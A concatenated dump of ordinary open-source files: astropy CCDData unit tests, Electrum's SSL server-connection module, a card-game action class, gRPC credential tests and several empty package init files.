@pytest.mark.data_unit(u.adu)
def test_mult_div_overload(ccd_data, operand, with_uncertainty,
operation, affects_uncertainty):
if with_uncertainty:
ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
method = ccd_data.__getattribute__(operation)
np_method = np.__getattribute__(operation)
result = method(operand)
assert result is not ccd_data
assert isinstance(result, CCDData)
assert (result.uncertainty is None or
isinstance(result.uncertainty, StdDevUncertainty))
try:
op_value = operand.value
except AttributeError:
op_value = operand
np.testing.assert_array_equal(result.data,
np_method(ccd_data.data, op_value))
if with_uncertainty:
if affects_uncertainty:
np.testing.assert_array_equal(result.uncertainty.array,
np_method(ccd_data.uncertainty.array,
op_value))
else:
np.testing.assert_array_equal(result.uncertainty.array,
ccd_data.uncertainty.array)
else:
assert result.uncertainty is None
if isinstance(operand, u.Quantity):
# Need the "1 *" below to force arguments to be Quantity to work around
# astropy/astropy#2377
expected_unit = np_method(1 * ccd_data.unit, 1 * operand.unit).unit
assert result.unit == expected_unit
else:
assert result.unit == ccd_data.unit
@pytest.mark.parametrize('operation,affects_uncertainty', [
("add", False),
("subtract", False),
])
@pytest.mark.parametrize('operand,expect_failure', [
(2.0, u.UnitsError), # fail--units don't match image
(2 * u.dimensionless_unscaled, u.UnitsError), # same
(2 * u.adu, False),
])
@pytest.mark.parametrize('with_uncertainty', [
True,
False])
@pytest.mark.data_unit(u.adu)
def test_add_sub_overload(ccd_data, operand, expect_failure, with_uncertainty,
operation, affects_uncertainty):
if with_uncertainty:
ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
method = ccd_data.__getattribute__(operation)
np_method = np.__getattribute__(operation)
if expect_failure:
with pytest.raises(expect_failure):
result = method(operand)
return
else:
result = method(operand)
assert result is not ccd_data
assert isinstance(result, CCDData)
assert (result.uncertainty is None or
isinstance(result.uncertainty, StdDevUncertainty))
try:
op_value = operand.value
except AttributeError:
op_value = operand
np.testing.assert_array_equal(result.data,
np_method(ccd_data.data, op_value))
if with_uncertainty:
if affects_uncertainty:
np.testing.assert_array_equal(result.uncertainty.array,
np_method(ccd_data.uncertainty.array,
op_value))
else:
np.testing.assert_array_equal(result.uncertainty.array,
ccd_data.uncertainty.array)
else:
assert result.uncertainty is None
if isinstance(operand, u.Quantity):
assert (result.unit == ccd_data.unit and result.unit == operand.unit)
else:
assert result.unit == ccd_data.unit
def test_arithmetic_overload_fails(ccd_data):
with pytest.raises(TypeError):
ccd_data.multiply("five")
with pytest.raises(TypeError):
ccd_data.divide("five")
with pytest.raises(TypeError):
ccd_data.add("five")
with pytest.raises(TypeError):
ccd_data.subtract("five")
def test_arithmetic_no_wcs_compare():
ccd = CCDData(np.ones((10, 10)), unit='')
assert ccd.add(ccd, compare_wcs=None).wcs is None
assert ccd.subtract(ccd, compare_wcs=None).wcs is None
assert ccd.multiply(ccd, compare_wcs=None).wcs is None
assert ccd.divide(ccd, compare_wcs=None).wcs is None
def test_arithmetic_with_wcs_compare():
def return_diff_smaller_3(first, second):
return abs(first - second) <= 3
ccd1 = CCDData(np.ones((10, 10)), unit='', wcs=2)
ccd2 = CCDData(np.ones((10, 10)), unit='', wcs=5)
assert ccd1.add(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
assert ccd1.subtract(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
assert ccd1.multiply(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
assert ccd1.divide(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
def test_arithmetic_with_wcs_compare_fail():
def return_diff_smaller_1(first, second):
return abs(first - second) <= 1
ccd1 = CCDData(np.ones((10, 10)), unit='', wcs=2)
ccd2 = CCDData(np.ones((10, 10)), unit='', wcs=5)
with pytest.raises(ValueError):
ccd1.add(ccd2, compare_wcs=return_diff_smaller_1).wcs
with pytest.raises(ValueError):
ccd1.subtract(ccd2, compare_wcs=return_diff_smaller_1).wcs
with pytest.raises(ValueError):
ccd1.multiply(ccd2, compare_wcs=return_diff_smaller_1).wcs
with pytest.raises(ValueError):
ccd1.divide(ccd2, compare_wcs=return_diff_smaller_1).wcs
def test_arithmetic_overload_ccddata_operand(ccd_data):
ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
operand = ccd_data.copy()
result = ccd_data.add(operand)
assert len(result.meta) == 0
np.testing.assert_array_equal(result.data,
2 * ccd_data.data)
np.testing.assert_array_equal(result.uncertainty.array,
np.sqrt(2) * ccd_data.uncertainty.array)
result = ccd_data.subtract(operand)
assert len(result.meta) == 0
np.testing.assert_array_equal(result.data,
0 * ccd_data.data)
np.testing.assert_array_equal(result.uncertainty.array,
np.sqrt(2) * ccd_data.uncertainty.array)
result = ccd_data.multiply(operand)
assert len(result.meta) == 0
np.testing.assert_array_equal(result.data,
ccd_data.data ** 2)
expected_uncertainty = (np.sqrt(2) * np.abs(ccd_data.data) *
ccd_data.uncertainty.array)
np.testing.assert_allclose(result.uncertainty.array,
expected_uncertainty)
result = ccd_data.divide(operand)
assert len(result.meta) == 0
np.testing.assert_array_equal(result.data,
np.ones_like(ccd_data.data))
expected_uncertainty = (np.sqrt(2) / np.abs(ccd_data.data) *
ccd_data.uncertainty.array)
np.testing.assert_allclose(result.uncertainty.array,
expected_uncertainty)
def test_arithmetic_overload_differing_units():
a = np.array([1, 2, 3]) * u.m
b = np.array([1, 2, 3]) * u.cm
ccddata = CCDData(a)
# TODO: Could also be parametrized.
res = ccddata.add(b)
np.testing.assert_array_almost_equal(res.data, np.add(a, b).value)
assert res.unit == np.add(a, b).unit
res = ccddata.subtract(b)
np.testing.assert_array_almost_equal(res.data, np.subtract(a, b).value)
assert res.unit == np.subtract(a, b).unit
res = ccddata.multiply(b)
np.testing.assert_array_almost_equal(res.data, np.multiply(a, b).value)
assert res.unit == np.multiply(a, b).unit
res = ccddata.divide(b)
np.testing.assert_array_almost_equal(res.data, np.divide(a, b).value)
assert res.unit == np.divide(a, b).unit
def test_arithmetic_add_with_array():
ccd = CCDData(np.ones((3, 3)), unit='')
res = ccd.add(np.arange(3))
np.testing.assert_array_equal(res.data, [[1, 2, 3]] * 3)
ccd = CCDData(np.ones((3, 3)), unit='adu')
with pytest.raises(ValueError):
ccd.add(np.arange(3))
def test_arithmetic_subtract_with_array():
ccd = CCDData(np.ones((3, 3)), unit='')
res = ccd.subtract(np.arange(3))
np.testing.assert_array_equal(res.data, [[1, 0, -1]] * 3)
ccd = CCDData(np.ones((3, 3)), unit='adu')
with pytest.raises(ValueError):
ccd.subtract(np.arange(3))
def test_arithmetic_multiply_with_array():
ccd = CCDData(np.ones((3, 3)) * 3, unit=u.m)
res = ccd.multiply(np.ones((3, 3)) * 2)
np.testing.assert_array_equal(res.data, [[6, 6, 6]] * 3)
assert res.unit == ccd.unit
def test_arithmetic_divide_with_array():
ccd = CCDData(np.ones((3, 3)), unit=u.m)
res = ccd.divide(np.ones((3, 3)) * 2)
np.testing.assert_array_equal(res.data, [[0.5, 0.5, 0.5]] * 3)
assert res.unit == ccd.unit
def test_history_preserved_if_metadata_is_fits_header(tmpdir):
fake_img = np.random.random(size=(100, 100))
hdu = fits.PrimaryHDU(fake_img)
hdu.header['history'] = 'one'
hdu.header['history'] = 'two'
hdu.header['history'] = 'three'
assert len(hdu.header['history']) == 3
tmp_file = tmpdir.join('temp.fits').strpath
hdu.writeto(tmp_file)
ccd_read = CCDData.read(tmp_file, unit="adu")
assert ccd_read.header['history'] == hdu.header['history']
def test_infol_logged_if_unit_in_fits_header(ccd_data, tmpdir):
tmpfile = tmpdir.join('temp.fits')
ccd_data.write(tmpfile.strpath)
log.setLevel('INFO')
explicit_unit_name = "photon"
with log.log_to_list() as log_list:
ccd_from_disk = CCDData.read(tmpfile.strpath, unit=explicit_unit_name)
assert explicit_unit_name in log_list[0].message
def test_wcs_attribute(ccd_data, tmpdir):
"""
Check that WCS attribute gets added to header, and that if a CCDData
object is created from a FITS file with a header, and the WCS attribute
is modified, then the CCDData object is turned back into an hdu, the
WCS object overwrites the old WCS information in the header.
"""
tmpfile = tmpdir.join('temp.fits')
# This wcs example is taken from the astropy.wcs docs.
wcs = WCS(naxis=2)
wcs.wcs.crpix = np.array(ccd_data.shape) / 2
wcs.wcs.cdelt = np.array([-0.066667, 0.066667])
wcs.wcs.crval = [0, -90]
wcs.wcs.ctype = ["RA---AIR", "DEC--AIR"]
wcs.wcs.set_pv([(2, 1, 45.0)])
ccd_data.header = ccd_data.to_hdu()[0].header
ccd_data.header.extend(wcs.to_header(), useblanks=False)
ccd_data.write(tmpfile.strpath)
# Get the header length after it has been extended by the WCS keywords
original_header_length = len(ccd_data.header)
ccd_new = CCDData.read(tmpfile.strpath)
# WCS attribute should be set for ccd_new
assert ccd_new.wcs is not None
# WCS attribute should be equal to wcs above.
assert ccd_new.wcs.wcs == wcs.wcs
# Converting CCDData object with wcs to an hdu shouldn't
# create duplicate wcs-related entries in the header.
ccd_new_hdu = ccd_new.to_hdu()[0]
assert len(ccd_new_hdu.header) == original_header_length
# Making a CCDData with WCS (but not WCS in the header) should lead to
# WCS information in the header when it is converted to an HDU.
ccd_wcs_not_in_header = CCDData(ccd_data.data, wcs=wcs, unit="adu")
hdu = ccd_wcs_not_in_header.to_hdu()[0]
wcs_header = wcs.to_header()
for k in wcs_header.keys():
# Skip these keywords if they are in the WCS header because they are
# not WCS-specific.
if k in ['', 'COMMENT', 'HISTORY']:
continue
# No keyword from the WCS should be in the header.
assert k not in ccd_wcs_not_in_header.header
# Every keyword in the WCS should be in the header of the HDU
assert hdu.header[k] == wcs_header[k]
# Now check that if WCS of a CCDData is modified, then the CCDData is
# converted to an HDU, the WCS keywords in the header are overwritten
# with the appropriate keywords from the header.
#
# ccd_new has a WCS and WCS keywords in the header, so try modifying
# the WCS.
ccd_new.wcs.wcs.cdelt *= 2
ccd_new_hdu_mod_wcs = ccd_new.to_hdu()[0]
assert ccd_new_hdu_mod_wcs.header['CDELT1'] == ccd_new.wcs.wcs.cdelt[0]
assert ccd_new_hdu_mod_wcs.header['CDELT2'] == ccd_new.wcs.wcs.cdelt[1]
def test_wcs_keywords_removed_from_header():
"""
Test, for the file included with the nddata tests, that WCS keywords are
properly removed from header.
"""
from ..ccddata import _KEEP_THESE_KEYWORDS_IN_HEADER
keepers = set(_KEEP_THESE_KEYWORDS_IN_HEADER)
data_file = get_pkg_data_filename('data/sip-wcs.fits')
ccd = CCDData.read(data_file)
wcs_header = ccd.wcs.to_header()
assert not (set(wcs_header) & set(ccd.meta) - keepers)
# Make sure that exceptions are not raised when trying to remove missing
# keywords. o4sp040b0_raw.fits of io.fits is missing keyword 'PC1_1'.
data_file1 = get_pkg_data_filename('../../io/fits/tests/data/o4sp040b0_raw.fits')
ccd = CCDData.read(data_file1, unit='count')
def test_wcs_keyword_removal_for_wcs_test_files():
"""
Test, for the WCS test files, that keyword removall works as
expected. Those cover a much broader range of WCS types than
test_wcs_keywords_removed_from_header
"""
from ..ccddata import _generate_wcs_and_update_header
from ..ccddata import _KEEP_THESE_KEYWORDS_IN_HEADER
keepers = set(_KEEP_THESE_KEYWORDS_IN_HEADER)
wcs_headers = get_pkg_data_filenames('../../wcs/tests/data',
pattern='*.hdr')
for hdr in wcs_headers:
# Skip the files that are expected to be bad...
if 'invalid' in hdr or 'nonstandard' in hdr or 'segfault' in hdr:
continue
header_string = get_pkg_data_contents(hdr)
wcs = WCS(header_string)
header = wcs.to_header(relax=True)
new_header, new_wcs = _generate_wcs_and_update_header(header)
# Make sure all of the WCS-related keywords have been removed.
assert not (set(new_header) &
set(new_wcs.to_header(relax=True)) -
keepers)
# Check that the new wcs is the same as the old.
new_wcs_header = new_wcs.to_header(relax=True)
for k, v in new_wcs_header.items():
if isinstance(v, str):
assert header[k] == v
else:
np.testing.assert_almost_equal(header[k], v)
def test_read_wcs_not_creatable(tmpdir):
# The following Header can't be converted to a WCS object. See also #6499.
hdr_txt_example_WCS = textwrap.dedent('''
SIMPLE = T / Fits standard
BITPIX = 16 / Bits per pixel
NAXIS = 2 / Number of axes
NAXIS1 = 1104 / Axis length
NAXIS2 = 4241 / Axis length
CRVAL1 = 164.98110962 / Physical value of the reference pixel X
CRVAL2 = 44.34089279 / Physical value of the reference pixel Y
CRPIX1 = -34.0 / Reference pixel in X (pixel)
CRPIX2 = 2041.0 / Reference pixel in Y (pixel)
CDELT1 = 0.10380000 / X Scale projected on detector (#/pix)
CDELT2 = 0.10380000 / Y Scale projected on detector (#/pix)
CTYPE1 = 'RA---TAN' / Pixel coordinate system
CTYPE2 = 'WAVELENGTH' / Pixel coordinate system
CUNIT1 = 'degree ' / Units used in both CRVAL1 and CDELT1
CUNIT2 = 'nm ' / Units used in both CRVAL2 and CDELT2
CD1_1 = 0.20760000 / Pixel Coordinate translation matrix
CD1_2 = 0.00000000 / Pixel Coordinate translation matrix
CD2_1 = 0.00000000 / Pixel Coordinate translation matrix
CD2_2 = 0.10380000 / Pixel Coordinate translation matrix
C2YPE1 = 'RA---TAN' / Pixel coordinate system
C2YPE2 = 'DEC--TAN' / Pixel coordinate system
C2NIT1 = 'degree ' / Units used in both C2VAL1 and C2ELT1
C2NIT2 = 'degree ' / Units used in both C2VAL2 and C2ELT2
RADECSYS= 'FK5 ' / The equatorial coordinate system
''')
with catch_warnings(FITSFixedWarning):
hdr = fits.Header.fromstring(hdr_txt_example_WCS, sep='\n')
hdul = fits.HDUList([fits.PrimaryHDU(np.ones((4241, 1104)), header=hdr)])
filename = tmpdir.join('afile.fits').strpath
hdul.writeto(filename)
# The hdr cannot be converted to a WCS object because of an
# InconsistentAxisTypesError but it should still open the file
ccd = CCDData.read(filename, unit='adu')
assert ccd.wcs is None
def test_header(ccd_data):
a = {'Observer': 'Hubble'}
ccd = CCDData(ccd_data, header=a)
assert ccd.meta == a
def test_wcs_arithmetic(ccd_data):
ccd_data.wcs = 5
result = ccd_data.multiply(1.0)
assert result.wcs == 5
@pytest.mark.parametrize('operation',
['multiply', 'divide', 'add', 'subtract'])
def test_wcs_arithmetic_ccd(ccd_data, operation):
ccd_data2 = ccd_data.copy()
ccd_data.wcs = 5
method = ccd_data.__getattribute__(operation)
result = method(ccd_data2)
assert result.wcs == ccd_data.wcs
assert ccd_data2.wcs is None
def test_wcs_sip_handling():
"""
Check whether the ctypes RA---TAN-SIP and DEC--TAN-SIP survive
a roundtrip unchanged.
"""
data_file = get_pkg_data_filename('data/sip-wcs.fits')
def check_wcs_ctypes(header):
expected_wcs_ctypes = {
'CTYPE1': 'RA---TAN-SIP',
'CTYPE2': 'DEC--TAN-SIP'
}
return [header[k] == v for k, v in expected_wcs_ctypes.items()]
ccd_original = CCDData.read(data_file)
# After initialization the keywords should be in the WCS, not in the
# meta.
with fits.open(data_file) as raw:
good_ctype = check_wcs_ctypes(raw[0].header)
assert all(good_ctype)
ccd_new = ccd_original.to_hdu()
good_ctype = check_wcs_ctypes(ccd_new[0].header)
assert all(good_ctype)
# Try converting to header with wcs_relax=False and
# the header should contain the CTYPE keywords without
# the -SIP
ccd_no_relax = ccd_original.to_hdu(wcs_relax=False)
good_ctype = check_wcs_ctypes(ccd_no_relax[0].header)
assert not any(good_ctype)
assert ccd_no_relax[0].header['CTYPE1'] == 'RA---TAN'
assert ccd_no_relax[0].header['CTYPE2'] == 'DEC--TAN'
@pytest.mark.parametrize('operation',
['multiply', 'divide', 'add', 'subtract'])
def test_mask_arithmetic_ccd(ccd_data, operation):
ccd_data2 = ccd_data.copy()
ccd_data.mask = (ccd_data.data > 0)
method = ccd_data.__getattribute__(operation)
result = method(ccd_data2)
np.testing.assert_equal(result.mask, ccd_data.mask)
def test_write_read_multiextensionfits_mask_default(ccd_data, tmpdir):
# Test that if a mask is present the mask is saved and loaded by default.
ccd_data.mask = ccd_data.data > 10
filename = tmpdir.join('afile.fits').strpath
ccd_data.write(filename)
ccd_after = CCDData.read(filename)
assert ccd_after.mask is not None
np.testing.assert_array_equal(ccd_data.mask, ccd_after.mask)
def test_write_read_multiextensionfits_uncertainty_default(ccd_data, tmpdir):
# Test that if a uncertainty is present it is saved and loaded by default.
ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
filename = tmpdir.join('afile.fits').strpath
ccd_data.write(filename)
ccd_after = CCDData.read(filename)
assert ccd_after.uncertainty is not None
np.testing.assert_array_equal(ccd_data.uncertainty.array,
ccd_after.uncertainty.array)
def test_write_read_multiextensionfits_not(ccd_data, tmpdir):
# Test that writing mask and uncertainty can be disabled
ccd_data.mask = ccd_data.data > 10
ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
filename = tmpdir.join('afile.fits').strpath
ccd_data.write(filename, hdu_mask=None, hdu_uncertainty=None)
ccd_after = CCDData.read(filename)
assert ccd_after.uncertainty is None
assert ccd_after.mask is None
def test_write_read_multiextensionfits_custom_ext_names(ccd_data, tmpdir):
# Test writing mask, uncertainty in another extension than default
ccd_data.mask = ccd_data.data > 10
ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
filename = tmpdir.join('afile.fits').strpath
ccd_data.write(filename, hdu_mask='Fun', hdu_uncertainty='NoFun')
# Try reading with defaults extension names
ccd_after = CCDData.read(filename)
assert ccd_after.uncertainty is None
assert ccd_after.mask is None
# Try reading with custom extension names
ccd_after = CCDData.read(filename, hdu_mask='Fun', hdu_uncertainty='NoFun')
assert ccd_after.uncertainty is not None
assert ccd_after.mask is not None
np.testing.assert_array_equal(ccd_data.mask, ccd_after.mask)
np.testing.assert_array_equal(ccd_data.uncertainty.array,
ccd_after.uncertainty.array)
def test_wcs(ccd_data):
ccd_data.wcs = 5
assert ccd_data.wcs == 5
def test_recognized_fits_formats_for_read_write(ccd_data, tmpdir):
# These are the extensions that are supposed to be supported.
supported_extensions = ['fit', 'fits', 'fts']
for ext in supported_extensions:
path = tmpdir.join("test.{}".format(ext))
ccd_data.write(path.strpath)
from_disk = CCDData.read(path.strpath)
assert (ccd_data.data == from_disk.data).all()
def test_stddevuncertainty_compat_descriptor_no_parent():
with pytest.raises(MissingDataAssociationException):
StdDevUncertainty(np.ones((10, 10))).parent_nddata
def test_stddevuncertainty_compat_descriptor_no_weakref():
# TODO: Remove this test if astropy 1.0 isn't supported anymore
# This test might create a Memoryleak on purpose, so the last lines after
# the assert are IMPORTANT cleanup.
ccd = CCDData(np.ones((10, 10)), unit='')
uncert = StdDevUncertainty(np.ones((10, 10)))
uncert._parent_nddata = ccd
assert uncert.parent_nddata is ccd
uncert._parent_nddata = None
|
MrChoclate/tripping_sansa | refs/heads/master | api/__init__.py | 12133432 | |
ThiagoGarciaAlves/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/conf/locale/en_GB/__init__.py | 12133432 | |
samliu/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/__init__.py | 12133432 | |
shaistaansari/django | refs/heads/master | tests/known_related_objects/__init__.py | 12133432 | |
toke/django-tastypie | refs/heads/master | tests/slashless/api/__init__.py | 12133432 | |
protonn/Electrum-Cash | refs/heads/master | lib/interface.py | 1 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import socket
import ssl
import sys
import threading
import time
import traceback
import requests
ca_path = requests.certs.where()
import util
import x509
import pem
def Connection(server, queue, config_path):
"""Makes asynchronous connections to a remote electrum server.
Returns the running thread that is making the connection.
Once the thread has connected, it finishes, placing a tuple on the
queue of the form (server, socket), where socket is None if
connection failed.
"""
host, port, protocol = server.split(':')
if not protocol in 'st':
raise Exception('Unknown protocol: %s' % protocol)
c = TcpConnection(server, queue, config_path)
c.start()
return c
class TcpConnection(threading.Thread, util.PrintError):
def __init__(self, server, queue, config_path):
threading.Thread.__init__(self)
self.config_path = config_path
self.queue = queue
self.server = server
self.host, self.port, self.protocol = self.server.split(':')
self.host = str(self.host)
self.port = int(self.port)
self.use_ssl = (self.protocol == 's')
self.daemon = True
def diagnostic_name(self):
return self.host
def check_host_name(self, peercert, name):
"""Simple certificate/host name checker. Returns True if the
certificate matches, False otherwise. Does not support
wildcards."""
# Check that the peer has supplied a certificate.
# None/{} is not acceptable.
if not peercert:
return False
if peercert.has_key("subjectAltName"):
for typ, val in peercert["subjectAltName"]:
if typ == "DNS" and val == name:
return True
else:
# Only check the subject DN if there is no subject alternative
# name.
cn = None
for attr, val in peercert["subject"]:
# Use most-specific (last) commonName attribute.
if attr == "commonName":
cn = val
if cn is not None:
return cn == name
return False
def get_simple_socket(self):
try:
l = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
except socket.gaierror:
self.print_error("cannot resolve hostname")
return
for res in l:
try:
s = socket.socket(res[0], socket.SOCK_STREAM)
s.settimeout(10)
s.connect(res[4])
s.settimeout(2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
return s
except BaseException as e:
continue
else:
self.print_error("failed to connect", str(e))
def get_socket(self):
if self.use_ssl:
cert_path = os.path.join(self.config_path, 'certs', self.host)
if not os.path.exists(cert_path):
is_new = True
s = self.get_simple_socket()
if s is None:
return
# try with CA first
try:
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True)
except ssl.SSLError, e:
s = None
if s and self.check_host_name(s.getpeercert(), self.host):
self.print_error("SSL certificate signed by CA")
return s
# get server certificate.
# Do not use ssl.get_server_certificate because it does not work with proxy
s = self.get_simple_socket()
if s is None:
return
try:
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None)
except ssl.SSLError, e:
self.print_error("SSL error retrieving SSL certificate:", e)
return
dercert = s.getpeercert(True)
s.close()
cert = ssl.DER_cert_to_PEM_cert(dercert)
# workaround android bug
cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
temporary_path = cert_path + '.temp'
with open(temporary_path,"w") as f:
f.write(cert)
else:
is_new = False
s = self.get_simple_socket()
if s is None:
return
if self.use_ssl:
try:
s = ssl.wrap_socket(s,
ssl_version=ssl.PROTOCOL_SSLv23,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs= (temporary_path if is_new else cert_path),
do_handshake_on_connect=True)
except ssl.SSLError, e:
self.print_error("SSL error:", e)
if e.errno != 1:
return
if is_new:
rej = cert_path + '.rej'
if os.path.exists(rej):
os.unlink(rej)
os.rename(temporary_path, rej)
else:
with open(cert_path) as f:
cert = f.read()
try:
b = pem.dePem(cert, 'CERTIFICATE')
x = x509.X509(b)
except:
traceback.print_exc(file=sys.stderr)
self.print_error("wrong certificate")
return
try:
x.check_date()
except:
self.print_error("certificate has expired:", cert_path)
os.unlink(cert_path)
return
self.print_error("wrong certificate")
return
except BaseException, e:
self.print_error(e)
if e.errno == 104:
return
traceback.print_exc(file=sys.stderr)
return
if is_new:
self.print_error("saving certificate")
os.rename(temporary_path, cert_path)
return s
def run(self):
socket = self.get_socket()
if socket:
self.print_error("connected")
self.queue.put((self.server, socket))
class Interface(util.PrintError):
"""The Interface class handles a socket connected to a single remote
electrum server. It's exposed API is:
- Member functions close(), fileno(), get_responses(), has_timed_out(),
ping_required(), queue_request(), send_requests()
- Member variable server.
"""
def __init__(self, server, socket):
self.server = server
self.host, _, _ = server.split(':')
self.socket = socket
self.pipe = util.SocketPipe(socket)
self.pipe.set_timeout(0.0) # Don't wait for data
# Dump network messages. Set at runtime from the console.
self.debug = False
self.unsent_requests = []
self.unanswered_requests = {}
# Set last ping to zero to ensure immediate ping
self.last_request = time.time()
self.last_ping = 0
self.closed_remotely = False
def diagnostic_name(self):
return self.host
def fileno(self):
# Needed for select
return self.socket.fileno()
def close(self):
if not self.closed_remotely:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self.socket.close()
def queue_request(self, *args): # method, params, _id
'''Queue a request, later to be send with send_requests when the
socket is available for writing.
'''
self.request_time = time.time()
self.unsent_requests.append(args)
def num_requests(self):
'''Keep unanswered requests below 100'''
n = 100 - len(self.unanswered_requests)
return min(n, len(self.unsent_requests))
def send_requests(self):
'''Sends queued requests. Returns False on failure.'''
make_dict = lambda (m, p, i): {'method': m, 'params': p, 'id': i}
n = self.num_requests()
wire_requests = self.unsent_requests[0:n]
try:
self.pipe.send_all(map(make_dict, wire_requests))
except socket.error, e:
self.print_error("socket error:", e)
return False
self.unsent_requests = self.unsent_requests[n:]
for request in wire_requests:
if self.debug:
self.print_error("-->", request)
self.unanswered_requests[request[2]] = request
return True
def ping_required(self):
'''Maintains time since last ping. Returns True if a ping should
be sent.
'''
now = time.time()
if now - self.last_ping > 60:
self.last_ping = now
return True
return False
def has_timed_out(self):
'''Returns True if the interface has timed out.'''
if (self.unanswered_requests and time.time() - self.request_time > 10
and self.pipe.idle_time() > 10):
self.print_error("timeout", len(self.unanswered_requests))
return True
return False
def get_responses(self):
'''Call if there is data available on the socket. Returns a list of
(request, response) pairs. Notifications are singleton
unsolicited responses presumably as a result of prior
subscriptions, so request is None and there is no 'id' member.
Otherwise it is a response, which has an 'id' member and a
corresponding request. If the connection was closed remotely
or the remote server is misbehaving, a (None, None) will appear.
'''
responses = []
while True:
try:
response = self.pipe.get()
except util.timeout:
break
if response is None:
responses.append((None, None))
self.closed_remotely = True
self.print_error("connection closed remotely")
break
if self.debug:
self.print_error("<--", response)
wire_id = response.get('id', None)
if wire_id is None: # Notification
responses.append((None, response))
else:
request = self.unanswered_requests.pop(wire_id, None)
if request:
responses.append((request, response))
else:
self.print_error("unknown wire ID", wire_id)
responses.append((None, None)) # Signal
break
return responses
def check_cert(host, cert):
try:
b = pem.dePem(cert, 'CERTIFICATE')
x = x509.X509(b)
except:
traceback.print_exc(file=sys.stdout)
return
try:
x.check_date()
expired = False
except:
expired = True
m = "host: %s\n"%host
m += "has_expired: %s\n"% expired
util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
def test_certificates():
from simple_config import SimpleConfig
config = SimpleConfig()
mydir = os.path.join(config.path, "certs")
certs = os.listdir(mydir)
for c in certs:
print c
p = os.path.join(mydir,c)
with open(p) as f:
cert = f.read()
check_cert(c, cert)
if __name__ == "__main__":
test_certificates()
|
mrroach/CentralServer | refs/heads/master | csrv/model/actions/make_a_run_action.py | 1 | """Base actions for the players to take."""
from csrv.model.actions import action
from csrv.model import cost
from csrv.model import errors
from csrv.model import events
from csrv.model import game_object
from csrv.model import parameters
class MakeARunAction(action.Action):
DESCRIPTION = 'Make a run.'
COST_CLASS = cost.MakeARunCost
def __init__(self, game, player, server):
action.Action.__init__(self, game, player)
self.server = server
@property
def description(self):
return 'Make a run on ' + str(self.server)
def __str__(self):
return self.description
def resolve(self, response=None, ignore_clicks=False, ignore_all_costs=False):
action.Action.resolve(
self,
ignore_clicks=ignore_clicks,
ignore_all_costs=ignore_all_costs)
self.game.log('The runner makes a run on %s' % self.server)
new_run = self.game.new_run(self.server)
new_run.begin()
|
deepaklukose/grpc | refs/heads/master | src/python/grpcio_tests/tests/unit/beta/_implementations_test.py | 29 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the implementations module of the gRPC Python Beta API."""
import datetime
import unittest
from oauth2client import client as oauth2client_client
from grpc.beta import implementations
from tests.unit import resources
class ChannelCredentialsTest(unittest.TestCase):
def test_runtime_provided_root_certificates(self):
channel_credentials = implementations.ssl_channel_credentials()
self.assertIsInstance(channel_credentials,
implementations.ChannelCredentials)
def test_application_provided_root_certificates(self):
channel_credentials = implementations.ssl_channel_credentials(
resources.test_root_certificates())
self.assertIsInstance(channel_credentials,
implementations.ChannelCredentials)
class CallCredentialsTest(unittest.TestCase):
def test_google_call_credentials(self):
creds = oauth2client_client.GoogleCredentials(
'token', 'client_id', 'secret', 'refresh_token',
datetime.datetime(2008, 6, 24), 'https://refresh.uri.com/',
'user_agent')
call_creds = implementations.google_call_credentials(creds)
self.assertIsInstance(call_creds, implementations.CallCredentials)
def test_access_token_call_credentials(self):
call_creds = implementations.access_token_call_credentials('token')
self.assertIsInstance(call_creds, implementations.CallCredentials)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
sburnett/seattle | refs/heads/master | seattlegeni/lockserver/tests/unit/single_lock_contention.py | 4 | import unittest
